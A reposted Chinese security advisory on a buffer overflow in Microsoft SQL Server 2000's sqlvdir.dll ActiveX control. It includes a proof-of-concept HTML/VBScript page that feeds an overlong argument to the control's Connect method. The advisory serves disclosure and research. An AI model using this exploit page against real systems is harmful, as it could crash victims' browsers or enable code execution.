Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞

最新推荐文章于 2022-01-19 22:09:45 发布
最新推荐文章于 2022-01-19 22:09:45 发布
阅读量389 收藏
点赞数
原文链接:http://www.cnblogs.com/allyesno/archive/2008/09/14/1290837.html
版权
受影响系统:
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
Microsoft SQL Server 2000
描述:
BUGTRAQ  ID: 31129

Microsoft SQL Server是一款流行的SQL数据库系统。

SQL Server所安装的sqlvdir.dll ActiveX控件(默认路径为C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll,clsid:FC13BAA2-9C1A-4069-A221-31A147636038)所暴露的ISQLVDirControl接口没有正确的验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意代码。

<*来源:Beenu Arora ( beenudel1986@gmail.com
  
  链接: http://marc.info/?l=bugtraq&m=122115323714605&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )"  memberName = "Connect"
progid     = "SQLVDIRLib.SQLVDirControl"
argCount   = 2
arg1="defaultV"
arg2=" http://test/test/test/te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:$%test\test\test\te?s\test\test\tes\\:$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:$%test\test\test\te?s\test\test\tes\\:$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"  
target.Connect arg1 ,arg2

</script>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

转载于:https://www.cnblogs.com/allyesno/archive/2008/09/14/1290837.html

weixin_30836759
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
谈谈缓冲区的溢出
Kobe Bryant的专栏
09-05 1335
缓冲区的溢出是我们经常遇到的一种错误情况,同时也是我们万万不能忽略的一种情况,因为它给程序乃至系统安全带来了很大的安全隐患。我们先来看一段代码:   #include "stdafx.h" #include"stdlib.h" void test(); void main(){ test(); system("pause"); } void test(){ char buf[4]
Microsoft.EntityFrameworkCore.SqlServer.dll
09-30
Microsoft.EntityFrameworkCore.SqlServer.dll NuGet 程序包,用以在.NET Core程序中连接SqlServer数据库的组件,当nuget程序包管理器无法正常安装时可以添加此引用到项目中。
缓冲区溢出
姜雪峰的专栏
06-11 595
缓冲区溢出(Buffer Overflow)是计算机安全领域内既经典又古老的话题。顾名思义,缓冲区溢出的含义是为缓冲区提供了多于其存储容量的数据,就像我们往杯子里面倒入过量的水一样,多于的那部分水就可能会发生你意想不到的事情。通常情况下,缓冲区溢出的数据只会破坏程序数据,造成程序意外终止。但是如果有人精心构造溢出数据的内容,就有可能造成意想不到的后果,比如对方就有可能获得系统的控制权,从而操控整个
缓冲区溢出保护机制——Windows
weixin_30654583的博客
03-11 383
缓冲区溢出保护机制 Windows GS安全编译选项 Visual Studio 2003及以后版本的Visual Studio中默认启用了这个安全编译选项。 GS编译选项为每个函数增加了一些额外的数据和操作: 1、在所有函数调用发生时,向栈帧内压入一个额外的随机DWORD,这个随机数被称作“canary”,用IDA反汇编时,又被称作“Security Cookie”。 2、canar...
sqlserver activex脚本例子
kook_tian的专栏
03-21 543
 **********************************************************************  Visual Basic ActiveX Script************************************************************************Function Main() dim myC
Microsoft SQL Server 堆栈溢出漏洞加固
weixin_33772645的博客
11-18 662
Microsoft SQL Server 堆栈溢出漏洞官网https://technet.microsoft.com/zh-cn/library/security/ms14-085.aspx下载对应SQLServer2008R2-KB2977320-x64补丁 转载于:https://blog.51cto.com/mvp2008/1874383...
Microsoft.SqlServer.Types.dll v11.00
07-29
Microsoft.SqlServer.Types.dll
Microsoft.SqlServer.Types.rar
09-13
Microsoft.SqlServer.Types:深入解析SQL Server空间类型》 在SQL Server数据库系统中,Microsoft.SqlServer.Types是一个不可或缺的组件,它提供了对空间数据类型的全面支持。这个组件是.NET Framework的一部分,...
Microsoft.SqlServer.Diagnostics.STrace.dll
03-01
未能加载文件或程序集“Microsoft.SqlServer.Diagnostics.STrace, Version=10.0.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91” 或它的某一个依赖项。系统找不到指定的文件。 (Microsoft.SqlServer.Dmf)
Microsoft.SQLServer.ManagedDTS.dll文件
11-09
`Microsoft.SQLServer.ManagedDTS.dll` 文件是微软SQL Server Integration Services(SSIS)的核心组件之一,主要用于在.NET环境中开发和管理SSIS包。这篇文章将深入探讨该文件的作用、SSIS的相关知识以及如何在.NET...
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】
qq_44394952的博客
01-19 5451
1.漏洞详情信息表: 2.系统和软件环境配置详情信息表: 虚拟机软件:vmware workstation 14 系统:Windows XP 系统、Kali系统 环境配置:(1)受害机:Windows XP SP3镜像(2)攻击机:Kali系统 3.漏洞还原详细步骤: (1)虚拟机受害机系统和攻击机系统之间能够相互通信 攻击机:Kali-192.168.110.129 目标机:Windows XP-192.168.110.128 (2)打开Windows XP系统,确定445端口开启。 输入“nets
CVE-2017-0144 (Windows server 2008系列缓冲区溢出漏洞
Fly_鹏程万里
03-15 8549
漏洞原理srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2) {   int v4; // edi@1   _BYTE *v5; // edi@1   unsigned int result; // eax@1   v4 = a...
bufbomb关于缓冲区溢出攻击
leafdown_的博客
11-23 2505
smoke 要求:构造攻击字符串作为目标程序输入,造成缓冲区溢出,使getbuf()返回时不返回到test函数,而是转向执行smoke 思路: 理解了getbuf栈的构成:开辟的空间[1][2][3]…[32]+rbp+返回地址 只需要把getbuf返回的地址设置为smoke地址即可(开始的时候因为不理解栈的结构,发懵了很久) 第一步:确定开辟空间大小00000000004018b9 <g
c语言 溢出原理,逆向工程日记之缓冲区溢出的基本原理(一)
weixin_35255032的博客
05-24 339
前言Hello,各位广大的网友们好。笔者为大二在校大学生,软件学院。为践行费曼学习法,并在前辈的建议下开始写自己的一系列博客,网上对于缓冲区溢出的例子基本在与Linux环境下操作。对未了解Linux内核以及常见操作指令的新手并不友好。鉴于此写下此文。实验前提实验环境 :windows 10;使用工具 :IDA pro , OllyDBG,vc6.0;目标软件 :test1.exe , test2....
缓冲区溢出问题
Edidaughter的博客
11-17 1191
1.什么是缓冲区溢出 缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出 攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指 令,甚至可以取得系统特权,进而进行各种非法操作。 缓冲区溢出(buffer overflow),是针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常 是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁著中断之际并获取程序乃至系统的控 制权。 ...
Microsoft SQL Server信息泄露及缓冲区溢出漏洞(MS08-040)(CVE-2008-0106)
最新发布
06-13
MS08-040是针对Microsoft SQL Server的一个安全公告,其中包括两个漏洞:信息泄露漏洞缓冲区溢出漏洞。这些漏洞可能会允许攻击者远程执行任意代码或者导致拒绝服务攻击。 信息泄漏漏洞(CVE-2008-0106)位于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值